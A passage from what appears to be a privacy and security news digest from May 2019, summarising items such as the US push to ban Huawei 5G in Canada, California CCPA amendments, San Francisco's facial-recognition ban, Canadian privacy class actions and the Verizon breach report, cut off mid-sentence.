US Senator Mark Warner (D. VA) vice-chair of the U.S. Senate intelligence committee is urging Canada to join the United States in blacklisting China’s Huawei Technologies from next-generation 5G wireless networks. Warner claims Washington’s anti-Huawei drive is not a Buy American campaign. Huawei, the world’s largest telecommunications-equipment manufacturer − is at the heart of the battle between Washington and Beijing over what the Trump administration says is an effort by China to use its tech companies to expand its geopolitical goals. Warner told The Globe and Mail that he’s concerned Western governments are not paying sufficient heed to Washington’s warnings on Huawei and that Huawei is an “indirect agent” of Beijing’s ruling Communist Party and that countries cannot safeguard its new 5G technology to prevent spying or backdoor malware. Warner asked “Does the Canadian government, the Canadian public, want to have a system where their communications could be vulnerable on a regular basis to a foreign power?” He said it is in Canada’s national-security interest to prohibit domestic wireless companies from installing Huawei’s 5G technology in its next-generation networks just as the United States, Australia and New Zealand have done. Canada and Britain, which are members of the Five Eyes intelligence-sharing alliance – along with the U.S., Australia and New Zealand – have not taken any action yet against Huawei, but are conducting cybersecurity reviews of Huawei’s 5G equipment. Warner discounted assertions from Huawei’s top executives that the company would be prepared to sign non-spying pacts with countries that allow their telecoms to use its 5G gear. He noted that the ruling Communist Party passed sweeping laws forcing its companies and citizens to collaborate on espionage. BCE and Telus are major users of Huawei 3G and 4G equipment and have lobbied the Trudeau government to allow it to buy the Chinese tech firm’s 5G technology. Rogers, the country’s second-largest telecom, uses 5G from Sweden’s Ericsson. “The idea you can make this equipment secure is fundamentally flawed,” he said. Mr. Warner said the ongoing maintenance of Huawei equipment – likely conducted by Huawei personnel – would give the company frequent access to Western wireless networks. Even if Canadians take over the upgrade work, Mr. Warner warns, there is still the risk of espionage through the repeated software updates that will be transmitted from Huawei to its equipment all over the world. “The idea that at any point in time, an upgrade could include a backdoor, malware … means there is not a way to get to the level of security that has traditionally existed amongst Five Eyes partners,” he said. The United States has warned that it would deny classified intelligence to allies who allow Huawei 5G. Mr. Warner said 5G technology is different in that risky vendors such as Huawei can’t be put behind a firewall. [The Globe and Mail | Huawei security and privacy chief calls for government collaboration  | The case against Huawei, explained | U.S. blacklisting of Huawei prompts European firms to follow suit | Mobile Carriers in Britain and Japan Begin to Turn Away From Huawei

US Government Programs

US – Lawmakers Seek to Curb Warrantless Device Searches at the Border

U.S. Sens. Ron Wyden, D-Ore., and Rand Paul, R-Ky., introduced the Protecting Data at the Border Act, which would require federal agents to obtain a warrant before searching the personal devices of U.S. residents crossing the border. Rep. Ted Lieu, D-Calif., introduced a companion bill in the House of Representatives. Currently, Customs and Border Protection can search devices without a warrant or probable cause. If the legislation is enacted, agents would have to obtain “a valid warrant supported by probable cause” to access personal devices. They would no longer be able to deny entry if an individual refused to provide passwords or social media account information and immediately destroy any data collected and notify the individual when it’s deleted. [NextGov]

US Legislation

US – California Excludes Employees from CCPA, Protects Loyalty Programs

On May 28 & 29, the California Assembly voted to approve four bills to amend the California Consumer Privacy Act (CCPA), including: 1) Assembly Bill 25: changes the CCPA so that the law does not cover collection of personal information from job applicants, employees, contractors, or agents; 2) Assembly Bill 1416: creates exceptions for businesses complying with government requests; provides exceptions for the sale of information for detection of security incidents or fraud; 3) Assembly Bill 846: provides certainty to businesses that certain prohibitions in the CCPA would not apply to loyalty or rewards programs.; and 4) Assembly Bill 1202: Data broker registration legislation would require data brokers to honor consumer opt-outs and any other rights afforded by the CCPA. The legislation now moves to the California Senate. In total, the Assembly has approved ten CCPA amendments. This blog post includes notes on the full list, [Ad Law Access (Kelly Drye)]

+++

 

 

1-15 May 2019

Biometrics

US – San Francisco Passes City Government Ban on Facial Recognition Tech

On May 14, San Francisco’s Board of Supervisors [meeting agenda] voted to approve a ban on the use of facial recognition tech by city agencies, including the police department by a vote of eight to one, with San Francisco District 2 Supervisor Catherine Stefani dissenting. The Stop Secret Surveillance Ordinance is the first ban of its kind for a major American city and the seventh major surveillance oversight effort for a municipality in California. Supervisor Aaron Peskin [here & wiki here], who sponsored the bill, said during Tuesday’s board meeting: “I want to be clear — this is not an anti-technology policy” deemphasizing the ban aspect and instead framing it as an outgrowth of the sweeping California data privacy reforms [such as the California Consumer Privacy Act (CCPA) – see here, wiki here & infographic here] and an extension of prior efforts in other counties around the state. In 2016, Santa Clara county passed its own predecessor to San Francisco’s surveillance oversight policy, but that ordinance did not include a ban. The ordinance also includes a provision that would require city departments to seek specific approval before acquiring any new surveillance equipment. The ban would not impact facial recognition tech deployed by private companies, though it would affect any companies selling tech to the city government. City agencies will be allowed to continue using what they already have, including police body cameras and license plate readers. Across the bridge from San Francisco, Oakland and Berkeley are both mulling their own sets of regulations for facial recognition tech, known as the Surveillance and Community Safety Ordinance and Surveillance Technology Use and Community Safety Ordinance, respectively. The East Bay might not be far behind San Francisco’s own vote. [TechCrunch | Forbes: Why San Francisco’s Facial Recognition Ban Won’t Actually Have Any Impact | Should Police Facial Recognition Be Banned? | San Francisco, Oakland could be first cities in nation to ban facial recognition | San Francisco Committee Passes Ordinance to Ban Facial Recognition]

US – Photo Storage App Used Images to Train Facial-Recognition Tech Without Users’ Knowledge

Photo storage app Ever used pictures shared to the service to train its facial-recognition system without informing its users. Ever has sold its facial-recognition technology to private companies, law enforcement and the military. “This looks like an egregious violation of people’s privacy,” American Civil Liberties Union of Northern California Technology and Civil Liberties Attorney Jacob Snow said. “They are taking images of people’s families, photos from a private photo app, and using it to build surveillance technology. That’s hugely concerning.” Ever CEO Doug Aley said the company does not share photos or any other identifying user information, but rather uses the images to teach an algorithm to better identify faces. [NBC News]

Big Data / Data Analytics / Artificial Intelligence

UK – ICO Blogs on Meaningfulness of Human Involvement in AI Systems

Researchers at the Information Commissioner’s Office (ICO) have started a series of blogs discussing the ICO’s work in developing a framework for auditing artificial intelligence (AI). The ICO [PDF] and European Data Protection Board (EDPB) have both published guidance on automated individual decision-making and profiling. The main takeaways are that human reviewers must actively check a system’s recommendation, consider all available input data, weigh up and interpret the recommendation, consider any additional factors and even use their authority and competence to challenge the recommendation if necessary. In some circumstances, human input should also consider the likelihood of additional risk factors which may cause a system to be regarded as solely-automated under the GDPR. More often, these risks appear in complex AI systems and can lead to (1) automation bias and (2) a lack of interpretability. ICO recommends that an organisation decides at the outset of its design phase if its AI application is intended (i) to enhance human decision-making or (ii) to make solely automated decisions. This decision requires management or board members to fully understand the risk implications of choosing one way or the other. Additionally, they need to ensure that accountability and effective risk management policies are in place from the outset. Other key recommendations to take away include: the training of human reviewers to ensure they understand the mechanisms and limitations of AI systems and how their own expertise enhances the systems; and the monitoring of reviewers’ inclinations to accept or reject the AI’s output and the analysis of such approaches. [Technology Law Dispatch (ReedSmith)]

Canada

CA – Canada Privacy Law Remains Focus in Google ‘Right To Be Forgotten’ Case

Instead of navigating constitutional questions, Canada’s Federal Court will render its decision on Google’s “right to be forgotten” case based on specific points in the country’s privacy law. The reference case, which was brought on by Privacy Commissioner Daniel Therrien in October, will focus on the interpretation of Google’s collection of personal data as it relates to de-indexing in Canada’s Personal Information Protection and Electronic Documents Act. Google tried to have the case dismissed in April on the grounds of exemption from both argued points of law and the lack of constitutional consideration in the OPC’s narrow inquiries, but the Federal Court dismissed the challenge. [Financial Post]

CA – B.C. Court Allows Class-Action Lawsuit Against Facebook to Expand

On May 10 B.C. Supreme Court Justice Nitya Iyer issued a ruling that a class-action lawsuit launched against Facebook by a British Columbia woman, Deborah Douez [details] is allowed to include to residents of Saskatchewan, Manitoba and Newfoundland and Labrador. Douez claims the social media giant used her image and those of others without their knowledge in the “sponsored stories” advertising program that is no longer in operation. Facebook Inc. fought the certification of the class action all the way to the Supreme Court of Canada and lost [see Docket 36616 & news news coverage] Justice Iyer also agreed with Douez that Facebook is obligated to pay any profits that it made from the unauthorized use of the class members’ names or portraits. If someone liked a product under the program, which ran from January 2011 to May 2014, Facebook generated a news feed endorsement using the person’s name and profile photo, but didn’t tell that person their image was being used. Iyer ruled if the plaintiffs were asking for damages, she would agree with Facebook that the change should be denied, but she notes that giving up the profit made is a remedy under privacy laws in Saskatchewan, Manitoba and Newfoundland and Labrador. [Calgary Herald]

CA – CMA Guide Addresses Privacy Commissioner Findings

The Canadian Marketing Association (CMA) made public the CMA Guide to Transparency for Consumers [Press release], noting that measures outlined in the Guide enable organizations to effectively address findings in the survey released last week by the Office of the Privacy Commissioner (OPC) [ “2018-19 Survey of Canadians on PrivacyPress Release]. The CMA Guide on Transparency for Consumers was developed by leading Chief Privacy Officers in Canada, and informed by two research studies issued by the CMA last year. “There has been a high level of interest in this guide since we released it to our members in January,” stated John Wiltshire, CMA president and CEO. “It is important to share this information with all Canadian marketers so that they can make it easier for consumers not only to know more about how their personal information is being used, but also to have more choice and control.” The CMA’s Transparency Framework is built on three pillars:

  • Information is layered so that consumers can choose the level of detail that suits them, and receive information in smaller amounts, as it is needed;
  • Information is tailored to the medium and the audience, such as a succinct user-friendly “privacy label” that can easily be read on a small screen; and
  • The approach reflects the shared roles of individuals, organizations and regulators.

Organizations can select from the approaches outlined in the CMA Guide to Transparency for Consumers to develop consumer information on their privacy practices that is suited to their business model and consumers’ preferences. [News & Views (The Canadian Marketing Association) | Canadians concerned about their privacy online and taking precautions: study]

CA – TTC Suspends Transit Officers’ Collecting of PI When Issuing Warnings

The Toronto Transit Commission (TTC) has suspended the practice of having its transit officers collect personal information from people who are issued warnings on the transit system, following a Star investigation [in March 2019] that raised privacy and discrimination concerns about the policy. The transit agency announced in mid-March that officers would stop using specialized police-style forms to collect the information, but at the time TTC CEO Rick Leary said they would still record riders’ personal details in their notebooks, pending the outcome of an internal review of the policy. However, at a meeting of the TTC board, Alan Cakebread, the head of the agency’s enforcement unit, revealed his officers are no longer recording the information at all [April 8 meeting details & docs]. “We’ve stopped collecting any of that data until the review of the program is complete,” he said. The agency is expected to report back to the board in July with the outcome of the review, which will examine the TTC’s need to take riders’ personal information, and how it is used and retained. Transit agency spokesperson Stuart Green confirmed that Cakebread directed officers to stop collecting the data on March 27, two weeks after Leary announced the discontinuation of the specialized forms. The agency has said the system allows them to identify potential repeat offenders and determine whether a rider deserves a ticket or merely a warning. Through a freedom of information request, the Star obtained redacted details from the database spanning nearly 11 years, during which time officers entered personal details from caution cards more than 40,000 times. [Toronto Star]

CA – Two Ontario Privacy Class Action Certification Decisions Released

The Ontario Superior Court of Justice has released two decisions in certification motions in privacy class actions: 1) In Tocco v. Bell Mobility Inc., 2019 ONSC 2916 (CanLII) [PDF], the Court certified the class action in which it is alleged that the defendant breached privacy rights by using the personal information of data service customers for a marketing initiative without obtaining their consent; and 2) In Kaplan v. Casino Rama, 2019 ONSC 2025 (CanLII) [see PDF], the Court dismissed the certification motion for the proposed class action brought by individuals whose personal information was stolen in a cyber-attack and subsequently posted online. We will comment on these decisions during our next monthly call on May 29, 2019 at 11:30 a.m. EDT. Please visit our events page to sign up for the May monthly privacy call, and for more information on all upcoming events. Also read AccessPrivacy’s third issue of “Privacy in the Courts: A Quarterly Review“. This quarterly review of Canadian jurisprudence contains summaries of recent privacy cases in both the public and private sectors, intended to help busy in-house counsel, Chief Privacy Officers and compliance professionals get quickly up-to-date, while gaining broader perspective on how Canadian privacy law is evolving over time. The case summaries, authored by Professor Teresa Scassa [see blog] of the University of Ottawa, are accompanied by expert commentary from Osler practitioners across different practice areas. [Access Privacy (Osler, Hoskin & Harcourt)]

CA – Proposed Privacy Class Action “Collapses in its Entirety” on Commonality

On May 7, 2019, in Kaplan v. Casino Rama Services Inc. (Kaplan), the Ontario Superior Court of Justice  refused to certify a privacy class action arising out of a criminal cyberattack that included allegations of breach of privacy, breach of contract and negligence [see 21 pg PDF ruling by Justice Belobaba here]. In November 2016, Casino Rama publicly announced that it was the victim of a criminal cyberattack in which patron, employee, and vendor information was stolen [see Ontario IPC statement  & news coverage]. The plaintiffs commenced a class action alleging negligence, breach of contract, intrusion upon seclusion, breach of confidence, and publicity given to private life. By the time of the certification hearing [November 2018], there was no evidence that anyone had experienced fraud, identity theft or any kind of compensable financial loss or serious and prolonged psychological harm because of the cyberattack. Justice Belobaba dismissed the motion for certification of the class action, holding: “The fact that there are no provable losses and that the primary culprit, the hacker, is not sued as a defendant makes for a very convoluted class action. Class counsel find themselves trying to force square (breach of privacy) pegs into round (tort and contract) holes.” The Court found that the scope and content of the standard of care in negligence owed to each class member would depend on the sensitivity of the personal information that had been collected about them: the less sensitive the information, the lower the standard of care. As a result, Justice Belobaba held that there was no basis in fact to establish that a question about whether the defendants breached any applicable duty of care could be answered in common across the class. Similarly, for the plaintiffs’ intrusion upon seclusion claim, the Court concluded that individual inquiries would be required to determine if class members were in fact embarrassed or humiliated by the disclosure of personal information about them (such as, for example, the fact that they were patrons of a casino). The breach of contract issues failed because the Court found that there was no evidence from any of the class members regarding the terms of any contracts relating to protection of personal information, or that such terms were sufficiently similar to allow for a class-wide determination of whether they were breached. Given the Court’s conclusion on the common issues, it did not determine the class definition. However, Justice Belobaba noted that even if the case had been certified, he would have defined the class more narrowly than the plaintiffs had proposed. The decision comes on the heels of another recent decision denying certification of a privacy class action, Broutzas v. Rouge Valley Health System (Broutzas) [read decision & overviews here & here], which signals that Canadian courts are scrutinizing the appropriateness of class proceedings in these types of highly individualized cases. Citing Broutzas, Justice Belobaba observed in Kaplan that not all personal information that may be disclosed without consent is necessarily private or confidential. Furthermore, where the kinds of personal information stolen in a cyberattack vary widely from individual to individual, questions relating to the standard of care in negligence and breach of privacy will quickly devolve into individual inquiries that are unsuitable for class treatment. Justice Belobaba also spoke in positive terms about Casino Rama and the Ontario Lottery and Gaming Corporation’s response to the cyberattack This is an important reminder to organizations that a prompt and effective response to a privacy breach is not only the right thing to do for affected customers and employees ― it also has the added benefit of reducing litigation risks. [Business Class (Blakes)]

CA – Canada Lawmakers Demand Facebook’s Zuckerberg, Sandberg Testify

Canadian lawmakers have summoned Facebook Inc.’s Mark Zuckerberg and Sheryl Sandberg to testify at a parliamentary committee after a watchdog report found the social media giant violated Canadian privacy law. Canada’s Standing Committee on Access to Information, Privacy and Ethics [see ETHI, meeting 147 details & watch] issued the summons in a closed-door meeting, according to minutes published afterwards [read]. Zuckerberg and Sandberg were summoned to appear at a date that hasn’t been determined. Canada privacy watchdog, Daniel Therrien [who was a witness at the May 7 meeting – read his prepared remarks], last month said Facebook committed “serious contraventions“ of Canadian law in the Cambridge Analytica saga, but that Facebook essentially dismissed the findings [read OPC Facebook report]. Therrien said he had no legal authority to enforce it, leading to the committee’s vote on Tuesday. “This is a highly unusual step to take but Facebook’s disregard for the rights of Canadian citizens and the recent finding of the Privacy Commissioner that Facebook broke Canadian law has necessitated our decision,” lawmaker Charlie Angus, who put forward the motion to summon the executives, said in an email Wednesday. “We will see if they are willing to respect the Parliament of Canada and the presence of legislators from around the world.” A Facebook spokeswoman did not immediately respond to a request for comment. [Bloomberg | CBC.ca | Facebook’s Mark Zuckerberg, Sheryl Sandberg face subpoena from Canadian Parliament | Ethics committee votes to subpoena Facebook’s Mark Zuckerberg to testify

CA – Yukon’s Public-Service Watchdog Releases 2018 Summary Report

On April 29, Diane McLeod-McKay who serves as the Yukon territory’s ombudsman, information and privacy commissioner and public interest disclosure commissioner  released her 2018 annual report. It outlines the key achievements as well as challenges faced by each of McLeod-McKay’s offices last year, and also provides examples of cases that each handled. She saw her workload double in 2018 compared to the year prior, with a sudden spike in whistleblower cases and requests to review the outcomes of access-to-information requests making up the lion’s share of the work. The busiest office was the one of the information and privacy commissioner (IPC), which accounted for 136 files in 2018. (In 2017, by comparison, the office opened just 64). Of those, 59 files were requests for review of the decisions made by various Yukon government departments in response to access to information requests, which are governed by the Access to Information and Protection of Privacy Act (ATIPP). The report pointed at lack of proper training and willingness to cooperate with the IPC amongst the staff at public bodies as the reasons behind a spike in requests for review — for example, not knowing how to properly conduct searches for records and taking months to provide the IPC with records that are subject to a review. In an interview April 30, McLeod-McKay added that the lack of proper upfront work by some public bodies has a “domino effect.” “When things aren’t … going well within the departments, it flows through to my office, and of course, that just means a whole bunch of resources being used to process these requests that shouldn’t be occurring,” she said. “I’m so backlogged right now, I have adjudications that are a year old that I can’t get to. And it’s very problematic from an access-to-information perspective, and distressing, I think, from a public who have a right of access.” The IPC office also saw a “slight increase” in Health Information Privacy and Management Act (HIPMA) files in 2018, opening 33 compared to 31 in 2017. [Yukon News]

CA – CBSA Officers Confiscate Lawyer’s Phone and Laptop After He Refuses to Give Up Passwords

On April 10 Toronto business lawyer and former Green party candidate Nick Wright [here & wiki here] had his phone and laptop seized by Canada Border Services Agency officers after he refused to tell them passwords. Wright is an elected bencher with the Ontario Law Society [see here]. He has maintained that his electronic devices contain information that’s protected under solicitor-client privilege, but the CBSA still intends to crack the password to conduct searches. He feels that searching phones without a warrant a “a breach of our constitutional rights”. Section 8 of the charter states that everyone has the right to be secure against unreasonable search or seizure. In June 2015, the CBSA issued an operational bulletin defining digital devices as “goods”—and maintains that officers are permitted to examine goods under the Customs Act and the Immigration and Refugee Protection Act. According to the Office of the Privacy Commissioner of Canada, charter rights at border points “continue to apply but are limited by state imperatives of national sovereignty, immigration control, taxation and public safety and security”. The bulletin was issued when the Conservatives were in power, but the current Liberal minister, Bill Blair, hasn’t amended it to offer any protections for lawyers who might have information about their clients on their devices. Chalk this up as another example of the Liberal government’s questionable regard for the Canadian Charter of Rights and Freedoms. [The Georgia Straight | “Your phone is not safe at the border,” advocates warn after man’s electronic devices seized at Pearson Airport | Canada Border Services seizes lawyer’s phone, laptop for not sharing passwords | CBSA has used DNA testing on some detainees since at least 2016. Now, it’s making national rules]

Consumer

CA – Canadians Concerned About Privacy Online and Taking Precautions: Study

According to a recent $66K survey conducted by Phoenix SPI for the Privacy Commissioner of Canada, Canadians have expressed concerns with how they believe their personal information is being handled by the government and companies [read OPC PR and survey]. 87% of the Canadians surveyed were concerned with the way social media platforms gather personal information to create detailed profiles of individuals. Two-thirds of individuals believe that the government is responsible for privacy protection, and nine in 10 people believe that their personal information on social media influences how decisions are made for them that the information affects their chances for a job, health coverage, and insurance claims. Phoenix SPI surveyed 1,500 Canadians and was conducted in February of this year 2019. [MobileSyrup]

WW – People Say They Care About Privacy But They Continue to Buy Devices That Can Spy On Them

Experts explain why people are giving mixed signals about smart tech. A new smart device survey of people in the United States, Canada, Japan, Australia, France, and the United Kingdom by Consumers International and the Internet Society highlights the seeming contradiction between peoples stated privacy preferences and their actions — see report. Some 63 percent of people find connected devices to be “creepy,” and 75% don’t trust the way their data is shared by those devices defined broadly as everyday products and devices that can connect to the internet using wifi or Bluetooth yet nearly 70 percent of survey takers said they own one or more smart or connected device defined broadly as everyday products and devices that can connect to the internet using wifi or Bluetooth. Mobile phones, tablets, and computers weren’t included. Furthermore, sales of smart devices increased 25% last year, according to marketing research firm IDC. A March study from voice-tech blog Voicebot showed that even those who said they were “very concerned” about the privacy risks posed by smart speakers were only 16% less likely to own one than the general public. Why would people buy and use devices in the presumed privacy of their homes if they don’t trust them? It’s complicated. [The remainder of this long article explores the reasons some experts propose]: 1) People don’t understand the extent of data smart devices are collecting; 2) The trade-offs are worth it; 3) Consumers don’t have other options; and 4) People assume the government will take care of it; 5) We don’t actually care that much about privacy … According to the survey, of those who don’t have connected devices, 28 percent cited a lack of trust in the devices’ privacy or security; 63 percent say they don’t have use for them. As smart devices become more useful and their privacy snafus more numerous, perhaps that sentiment will flip. [Vox] | The privacy paradox: why do people keep using tech firms that abuse their data? | Consumers kinda, sorta care about their data | People Are Concerned About Their Privacy in Theory, Not Practice, Says New Study | Americans care about their digital data, but not enough to quit big tech | New Study Shows That Americans Will Not Pay for Online Privacy | The Privacy Paradox and the Marketer’s Dilemma]

WW – Study Reveals Privacy Behavior Affected by Wi-Fi Location

According to a Pennsylvania State University study, researchers found an individual’s online privacy behaviors and habits vary based on the internet connection they are using. The study focused on participants’ “publicness heuristic,” which is a mindset that keeps a person from revealing private things in public settings, and it explored how the mindset works with different privacy-related scenarios in various locations. The research concluded that participants with a higher publicness heuristic viewed a public network as less secure than their home or a university network, which led them to disclose less information and participate in fewer unethical behaviors. “These results indicate a need to leverage the positive heuristics triggered by location, VPN logo and a terms and conditions statement for ethical design practices,” Penn State James P. Jimirro Professor of Media Effects S. Shyam Sundar said. [PSU News]

WW – New Book Debates Effects of Tech on Teens

At the IAPP Global Privacy Summit, Data & Society Founder and President danah boyd joined Marc Groman and David Reitman’s Their Own Devices podcast to talk about her new book, “It’s Complicated: The Social Lives of Networked Teens.” After interviewing more than 150 teens across 18 states, boyd concluded that technology might not have as poor of an impact on teens as many perceive, and she is concerned that teen perspectives are being overlooked on the topics of tech, online policy and their own online actions. Groman and Reitman discuss and debate boyd’s findings and what role parents have in a teen’s digital presence. [Apple podcast]

E-Mail

CA – Individual Found Liable for CASL Compliance Violations

In an April 23 precedent setting decision, the Canadian Radio-television and Telecommunications Commission (CRTC) fined the former President and Chief Executive Officer [Knoxville, TN businessman Brian Conley] of a group of businesses [nCrowd, Inc. BBB here also see here], $100,000 for Canada Anti-Spam Law (CASL) [see text here also guidance at CRTC here & OPC here] compliance violations [read CRTC PR, Notice of Violation/Summary & decision]. A CRTC investigation which began in response to complaints submitted by both Canadian businesses and individuals determined that the companies committed systematic violations of CASL [and that Conley was allowing or ignoring violations of the law] The complainants alleged that the subject emails were sent to them without their consent and that they were unable to unsubscribe from future receipt of email from nCrowd. As part of its investigation, the CRTC provided notice to nCrowd’s President and CEO that the agency sought to hold him personally liable for the companies’ alleged violations. The CRTC found that nCrowd purchased an email distribution list that was comprised of addresses published online rather than addresses for which express consent to receive commercial email was obtained. It determined that nCrowd failed to provide any evidence that it had internal policies or procedures designed to ensure compliance with CASL’s opt-out requirements, which necessitate, among other things, that consumer opt-out requests are honored within 10 business days of receipt. Ultimately the CRTC concluded that the executive was personally liable for these violations due to the agency’s determination that he directed, authorized, assented to, acquiesced in, or otherwise participated in the commission of the subject violations. Importantly, the CRTC determined that personal liability is proper even if the companies themselves are not held liable for such CASL violations. [KMT Blog (Klein Moynihan Turco) | CRTC ups the CASL liability ante for directors and officers | | CASL Violations – CRTC is Serious About Director Liability | Canada’s anti-spam law used against ex-CEO of coupon marketing company | Anti-spam laws are overreaching, say lawyers]

EU Developments

EU – CNIL Releases Best Practices to Improve Products at Design Stage

France’s data protection authority, the CNIL, has released a series of best practices to help developers improve their products at the design stage. The agency released its “Developer Kit” as a way to ensure any solution, website or program that processes data is created to protect users’ information. The CNIL offers recommendations for developers when choosing a tool, such as reading the conditions of use if the tool receives personal data. The kit also offers guidelines for managing source code, strengthening the quality of the code, and documenting code and architecture. (Original article is in French.) [CNIL.fr]

WW – Microsoft Changes Data-Collection Categories

Microsoft is updating its data-collection methods following run-ins with the European Data Protection Supervisor and the Dutch government over EU General Data Protection Regulation compliance. Microsoft will now have “required” and “optional” categories for the data it collects from customers using its services. “In recent months we’ve heard from customers — especially those in Europe — with questions about the data that is collected from their devices when they use our products and services,” Microsoft Corporate Vice President and General Counsel Julie Brill said. “We are working on providing additional configuration options that will give customers more control over the collection of data that’s required for certain features or functions.” [ZDNet]

Facts & Stats

US – Errors Blamed for 21% of Data Breaches: Verizon Report

Verizon issued its 2019 Data Breach Investigations Report May 8 [see PR, Executive Summary, read the full report or download PDF] It says 21% of data breaches looked at last year were caused by employee errors. More worrying, system administrators as a source of accidental breaches are creeping up. “While the rogue admin planting logic bombs and other mayhem makes for a good story.” says the report, “the presence of insiders is most often in the form of errors. These are either by misconfiguring servers to allow for unwanted access or publishing data to a server that should not have been accessible by all site viewers.” The overwhelming majority of threats come from outside the enterprise — 69% of the breaches looked at. Insiders — defined as employees — were behind 34% of breaches, partners were blamed for 2%, while 5% involved insiders and partners. This year’s report looked at 41,686 security incidents from 73 contributors (including the FBI), of which 2,013 were confirmed data breaches. Verizon defines a data breach as a disclosure of data, not just a potential leak. The report breaks incidents into nine classifications (crimeware, espionage, insider and privilege misuse, denial of service, payment card skimmers, point of sale intrusions, miscellaneous errors) and applies them across a number of sectors. The idea is to give CISOs in these industries insight into patterns and plan their defence strategies. Among the findings:

  1. 15% of breaches were caused by misuse by authorized users;
  2. 29% of breaches involved stolen credentials;
  3. 56% of breaches took months or longer to discover;
  4. C-level executives are increasingly and proactively targeted by social engineering-related breaches;
  5. compromise of web-based email accounts using stolen credentials (98%) is rising. It’s was seen in 60% of attacks involving hacking a web application;
  6. one quarter of all breaches still associated with espionage;
  7. ransomware attacks are still strong, accounting for 24 per cent of the malware incidents analyzed and ranking second in most-used malware varieties; and
  8. discovery of cryptomining malware gets a lot of news, but in this report’s sample only accounted for roughly two per cent of incidents.

[IT World Canada]| www.scmagazine.com: Verizon Breach Report: Attacks on top executives and cloud-based email services increased in 2018
threatpost.com: Verizon Data Breach Report: Espionage, C-Suite and Cloud Attacks on the Rise
enterprise.verizon.com: 2019 Data Breach Investigations Report – Executive Summary (PDF)
enterprise.verizon.com: 2019 Data Breach Investigations Report – Full Report (PDF)

US – Employees Often the Weakest Link

According to new research from MediaPRO, organizations are failing in training employees on how to handle data with these regulations in mind [2019 Eye on Privacy Report PR]. And It isn’t just the new regulations [such as GDPR and the California Consumer Privacy Act (CCPA)] where employees are in the dark about best practices. The study found 58% of employees said they had never heard of the PCI Standard for credit card data protections [see FAQ]. The IT department was found to be least aware of what constitutes sensitive data, with 73% in the tech sector ranking Social Security numbers as most sensitive, compared to 88% of employees in all other sectors. MediaPRO’s chief strategist Tom Pendergast thinks the most surprising result in the study was the generally poor performance of people across this spectrum, especially since cybersecurity and data privacy are headline news. Also, people don’t connect privacy and security between work and personal. “If they haven’t personally been impacted by identity theft, it doesn’t seem like a big deal,” he said. “When we build our training and reinforcement, we’re really trying to give people a reason to care about privacy, and to apply what they learn to both their home and their work lives.” Security and privacy aren’t the same issue, but best practices and employee training should follow a similar path because, Pendergast pointed out, the distinctions are not all that meaningful to most people: “I think it feels pretty continuous to most folks, and I often urge people to combine their security and privacy awareness efforts in order to make them more meaningful and more practical to people.” Pendergast advised building your program and policies around the highest privacy standards and educating people on the core principles and actions they need to know in order to follow the new standards. [Security Boulevard]

Finance

CA – OPC Views on Open Banking for Canadian Consumers

On May 9, the Deputy Commissioner of Policy and Promotion of the Office of the Privacy Commissioner of Canada, Gregory Smolynec appeared before the Standing Senate Committee on Banking, Trade and Commerce [meeting details & watch] to examine and report on the potential benefits and challenges of open banking for Canadian financial services consumers, with specific focus on the federal government’s regulatory role. In his prepared remarks, he mentions his previous recommendations and the potential risks of open banking His specific recommendations from the past and continuing today included that:

  1. express meaningful consent be obtained from consumers;
  2. both technical and privacy standards be developed to ensure consistent ground rules;
  3. companies be accredited or licensed before being authorized to participate; and\
  4. PIPEDA be reformed to provide the OPC with stronger enforcement powers, including the power to make orders, impose fines for non-compliance with the law, as well as the right to independently verify compliance, without grounds, to ensure organizations are truly accountable for protecting personal information. [Privacy Commissioner of Canada]

CA – ‘An Incredibly Troubling Notion’: Drastic New Tool to Fight Money Laundering Alarms Civil Rights Advocates

B.C. has a $7.4-billion problem — that’s the bottom line of two bombshell reports on money laundering released this week. The reports make dozens of suggestions for tackling the issue, but civil liberties advocates were alarmed to see something called unexplained wealth orders (UWOs) among the recommendations which go a step beyond civil forfeiture and “allow confiscation without finding the crime,” criminal law expert Maureen Maloney and two co-authors wrote in a new report. “I think it’s an incredibly troubling notion,” said Micheal Vonn, policy director of the B.C. Civil Liberties Association. With UWOs, anyone targeted by the government would be required to prove they bought their property using legitimate sources of income. The province wouldn’t need to show any link to criminal activity. The proposal is fraught with serious issues, like doing away with the presumption of innocence and subverting the rights that shield Canadians from unreasonable search and seizure. According to Vonn “What you have is a report that basically sets out to say, look, we just don’t have the policing resources or expertise to get at this, so how do we get around the criminal law?.” The province already has multiple options for confiscating property linked to crime. B.C. Finance Minister Carole James told CBC News in an email that the government will consider adding UWOs to the list. Vonn worries about the unintended consequences of going down this road while the intention of a UWO scheme might be to tackle money laundering, even the most well-intentioned laws can end up serving other purposes. “We see it time and time again,” she said. “To say that we would introduce this kind of tool and not expect it to produce abuses would be phenomenally naive.” [CBC News | Comment: Hidden costs to crackdown on dirty money]

FOI

US – ODNI, NSA Publish ‘Statistical Transparency Report’

The U.S. Office of the Director of National Intelligence and the National Security Agency have released the sixth edition of the “Statistical Transparency Report Regarding Use of National Security Authorities.” The report offers a review of the use of warrants and law enforcement activities under the Foreign Intelligence Surveillance Act of 1978. This year’s report shows 9,637 warrantless queries were made for U.S. citizen communications data from NSA databases in 2018. The number of queries is up from 7,512 in 2017. The report also reveals the number of foreign organizations or individuals that were targeted under Section 702 of FISA jumped from 129,080 to 164,770, while the number of U.S. phone call records collected dropped by nearly 100 million. [ZDNet]

Genetics

CA – CBSA Has Used DNA Testing on Some Detainees Since 2016

According to documents obtained by Global News under access-to-information laws a 2018 report by Vice News outlining the use of DNA testing by the Canada Border Services Agency (CBSA) to identify immigration detainees with the assistance of ancestry websites to find and contact their distant relatives sent officials there into a scramble to figure out what their own rules were for the practice. The privacy rules of DNA/genealogy/ancestry companies have come under scrutiny over the issue of sharing genetic data with third-parties such as police and CBSA. The Vice report and subsequent others prompted a CBDS internal review just one week later with the goal of creating a national policy to guide the controversial practice of using DNA tests to identify some detainees. A spokesperson for the CBSA confirmed to Global News that work remains underway to create a national policy but did not say when it will come into effect. The documents requested by Global News focused on whether management at CBSA in Toronto had given approval for the testing, what internal policy it uses in determining when to do DNA testing, what kind of consent was obtained from the detainee and how often it performs such tests. In response, the assistant director of immigration investigations in Toronto emailed back saying the technique had been used since roughly October 2016 and that cases were being approved by the assistant director of removals in the branch. Responses to the question of how many times the technique had been used were not provided, with officials saying it was not possible because the cases were not logged but rather only documented within individual case files themselves, which would require searching through all files to determine a response. Another memo in the release package though notes there have been discussions within the CBSA about DNA testing of detainees going back to 2008. Officials at the CBSA in Toronto noted in the exchanges that they had been getting written consent from detainees prior to testing. They also said they informed the detainees of the 